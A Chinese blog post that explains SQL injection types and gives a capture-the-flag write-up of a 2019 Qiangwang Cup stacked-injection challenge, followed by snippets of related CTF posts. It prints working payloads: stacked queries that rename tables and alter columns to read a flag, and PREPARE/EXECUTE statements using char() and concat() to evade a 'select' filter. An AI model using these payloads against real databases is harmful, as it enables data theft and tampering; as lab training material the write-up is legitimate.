sql注入的初步了解以及CTF的一些题的wp

最新推荐文章于 2023-06-21 00:32:06 发布
最新推荐文章于 2023-06-21 00:32:06 发布
阅读量284 收藏 1
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55771794/article/details/118636134
版权

目录

一丶Sql注入简介

二丶sql注入详解

三丶sqli-labs 

四丶sqli的分类

五丶真题实践

        方法一 堆叠注入与重命名

        方法二!预处理语句与堆叠注入

一丶Sql注入简介

        Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。

二丶sql注入详解

        当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。

这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。

        sql又叫Structured Query Language名为结构化查询语言。

        在我们的应用系统使用sql 语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接 sql 语句的时候,我们可以改变 sql 语句。从而让数据执行我们想要执行的语句,这就是我们常说的 sql注入

Sql 注入带来的威胁主要有如下几点:

  • 猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。
  • 绕过认证,列如绕过验证登录网站后台。
  • 注入可以借助数据库的存储过程进行提权等操作

三丶sqli-labs 

sqli-lab是一个印度的程序员写的,一个用来学习sqli的一个游戏教程

鉴于之前已经搭好了靶场,那我们就直接进入主题吧!

ps:若还没有搭建的,可在CSDN上自行搜索方法等等。

注意,本文章偏向回忆性,因为之前已经做过了一些题,但是搞忘了。

四丶sqli的分类

关于sqli有哪些分类

基于从服务器接收到的响应
        1.基于错误的 SQL 注入
        2.联合查询的类型
        3.堆查询注射
        4.SQL 盲注

                1.基于布尔 SQL 盲注

                2.基于时间的 SQL 盲注
                3.基于报错的 SQL 盲注

基于如何处理输入的 SQL 查询(数据类型)
•基于字符串
•数字或整数为基础的
基于程度和顺序的注入 ( 哪里发生了影响 )
一阶注射
二阶注射
        一阶注射是指输入的注射语句对 WEB 直接产生了影响,出现了结果;二阶注入类似存
储型 XSS ,是指输入提交的语句,无法直接对 WEB 应用程序产生影响,通过其它的辅助间
接的对 WEB 产生危害,这样的就被称为是二阶注入 .
基于注入点的位置上的
        通过用户输入的表单域的注射。
        通过 cookie 注射。
        通过服务器变量注射。 (基于头部信息的注射)

五丶真题实践

方法一 堆叠注入与重命名

这是2019强网杯的一道sqli 

当尝试输入1'时,得到错误信息,于是从中可以知道使用 '' 可以进行语句的闭合

使用联合查询,且咱发现只有两列,从反馈来看,这好像是过滤了一些字符

因为有错误反馈,所以我们试试基于错误的盲注,但是只能得到一点点消息。

 在网上查阅一番后,我了解到了堆叠查询

堆叠查询可以使用多条SQL语句,语句之间用“ ;”隔开

当使用mysqli_multi_query()函数,会对传入数据进行一个预处理操作,所以不会存在堆叠注入的问题。

于是,不能用select的话,利用show databases来查看数据库

 查tables时

words表中的内容为

 进入一串数字的那个表看看,可以发现我们已经找到了flag,现在想办法把它弄出来

中和以上的信息,我们可以判断这个提交就是在表中查询数据,id和data,从words中选取,我们将words改为其他的,然后将数字表名改为words,flag改为id,相当于把使用的表改为flag所在的,然后输出flag的内容,

-1';
rename table `words` to `word`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);
show columns from words;--+
# ALTER TABLE tiger (表名) CHANGE tigername(要修改的列) name (修改后的列名) VARCHAR(20)(类型);

最后这样就可以得到flag啦!

 

方法二!预处理语句与堆叠注入

这是在其他博主看来的,所以作为拓展与分享。

PREPARE name from '[my sql sequece]';   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL语句

运用到了char()函数

CHAR()解释每个参数n为一个整数,并返回包含这些整数的代码值中给出的字符的字符串。NULL值被跳过。

char(115,101,108,101,99,116)<----->'select'

可以直接使用char语句

1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#

也可以使用concat的拼接来绕过对于select的过滤

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

由于不太熟练,借鉴了一些wp,如有思路不正确之处,以及细节问题,希望大家指正,之后呢也会不定期的分享一些题的wp,或者一些学习经验,希望和大家一起成长!

 

Tang_y1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生赛]sql - 联合注入
oZuoShen123的博客
10-07 651
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这相比于参考文章的目多了waf过滤。首先,仍然是网站标提示参数是wllm。
CTF---Web---SQL注入---05---MongoDB+宽字节注入
qq_22160557的博客
07-29 852
文章目录前言一、目描述二、解步骤1、分析传入参数2、判断注入方式3、宽字节注入三、总结 前言 目分类: CTFWebSQL注入—05—MongoDB+宽字节注入 一、目描述 目:研究生的秘密 二、解步骤 1、分析传入参数 Step1:http://192.168.87.173/index.php?title=Mysql%20%E6%95%99%E7%A8%8B ,查看源代码,,只有title的值等于页面的参数时,content才有内容 2、判断注入方式 Step2:当title=1时
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
南邮ctf mysql_南邮CTF--SQL注入
weixin_28692867的博客
02-01 176
南邮CTF--SQL注入目:GBK SQL injection解析:1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清目,GBK,接下来利用宽字节进行注入2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功3.继续改参数,1=2时,没有任何信息,找到注入点4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显...
南邮CTF--SQL注入
weixin_34219944的博客
05-18 323
南邮CTF--SQL注入 目:GBK SQL injection 解析: 1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清目,GBK,接下来利用宽字节进行注入 2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功 3.继续改参数,1=2时,没有任何信息,找到注入点 4.利用order by 查询列数,当查询2时,显...
ctf解——sql注入(cookie注入)
ckkkkkkkkke的博客
10-31 875
1.知识点   cookie注入的原理是:就要修改cookie的值,我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。   相对post和get方式注入来说,cookie注入就要稍微繁琐一些了,要进行cookie注入,我们首先就要修改cookie,这里就需要使用到Javascript语言
CTF-Web26(涉及SQL注入--基础
→_→
09-28 1151
26.这个看起来有点简单! 分析: 这一道很明显是一道SQL注入,这里我们手工注入: 1、判断是否存在注入点 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=2 回显不同,说明存在注入点 2、猜字段数 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2 ...
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 453
关于SQL注入的相关CTF笔记
CTF学习笔记——sql注入(2)
Obs_cure的博客
08-16 584
一、[SUCTF 2019]EasySQL 看标就知道是关于sql注入目。老规矩,先跑一下sqlmap,再用1’ or 1=1 #试试。 全部木大了…看writeup吧…
CTFHUB-web-SQL注入
ookami6497的博客
11-29 804
CTFHUB SQL
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1249
简单的SQL注入
Bugku Web CTF-sql注入2
No Title
01-14 693
这道过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
CTF--SQL注入
weixin_43882862的博客
08-13 449
靶场第1SQL注入 目 链接:http://59.63.200.79:8003/ 解思路 打开链接,发现是一个网站,里面有个点击新闻,尝试点开。。。。 点开以后,域名变为:http://59.63.200.79:8003/?id=1 怀疑是不是有数字型SQL注入呢? 构造payload试一试 使用hackbar构造payload and 1=1,发现回显成功。。 构造and 1=2,发现回显失败。。所以判定为数字型SQL注入。下面开始SQL联合注入。。。 第一步:判断字段数 构造paylo
ctf中的sql注入
weixin_42349846的博客
04-13 707
1.http://117.34.116.134:10011/web/web4/index.php?number=1001\ 解思路:https://blog.csdn.net/dcison/article/details/53125540 2.栅栏解密 http://www.cnblogs.com/superking-sukai/p/8491349.html ...
webctf09Day主要学习了下SQL注入bugweb 多次
taochiyudadada的博客
05-22 161
我要成为web???? 数据库查询语言! sql注入是 用户提交的语句被数据库执行了! –也是是注释符 1.多次 打开目什么也没有呀! 看url里有个id试一试1/2/3/4。。。 发现有提示 You can do some SQL injection in here. SQL注入? 这怎么注入呢? 先是报错注入 个人理解是利用报错点,来进行注入,也就是实现数据库功能! 这个我先试了试: id=1’是报错 id=1‘’是对的 用#(%23)...
三步法搞定CTF中的SQL注入
weixin_30536513的博客
04-03 482
三步法: 一、找到注入点 二、Fuzz出未过滤字符 三、构造payload/写脚本 例1 打开目: 第一步,寻找注入点。 输入用户名123456,密码123456,返回结果username error! 输入用户名admin,密码123456,返回结果password error! 输入用户名admin,密码admin,返回结果password e...
mysql注入ctf_CTF-攻防世界-supersqli(sql注入)
weixin_30698721的博客
02-02 321
目解过程试了一下单引号,发现存在注入,数据库类型是MariaDB第一反应是工具跑一下>_继续跑表名,没跑出来,尝试了下执行sql,也木有任何返回。。。看了一下当前用户是root,但不是dba,难道是木有权限。。。再回到页面试了下,发现有过滤关键字,这应该就是工具没跑出表来的原因。把绕过的方法挨个试了一遍,发现可以堆叠注入,查出两个表名来,但是不能select数据出来(因为关键字过滤了。。...
CTFCTFshow-SQL注入(持续更新)
最新发布
qq_53099119的博客
06-21 873
CTFshow sql
CTFweb学习记录 -- SQL注入基础
lifanxin的博客
05-18 772
SQL注入概述基本原理MySql注入基本知识information_schemasql注入常用知识总结 概述   SQL注入就是指web应用程序对用户输入数据的合法性没有判断,没有进行有效的字符过滤,前端传入后端的参数是攻击者可控的,并且参数被带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 基本原理   所谓sql注入的基本原理,也就是说sql注入是怎么发生的,我们以下面php代码中构造sql查询语句的方式为例。 <?php $id = $_GET['id']; $que
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值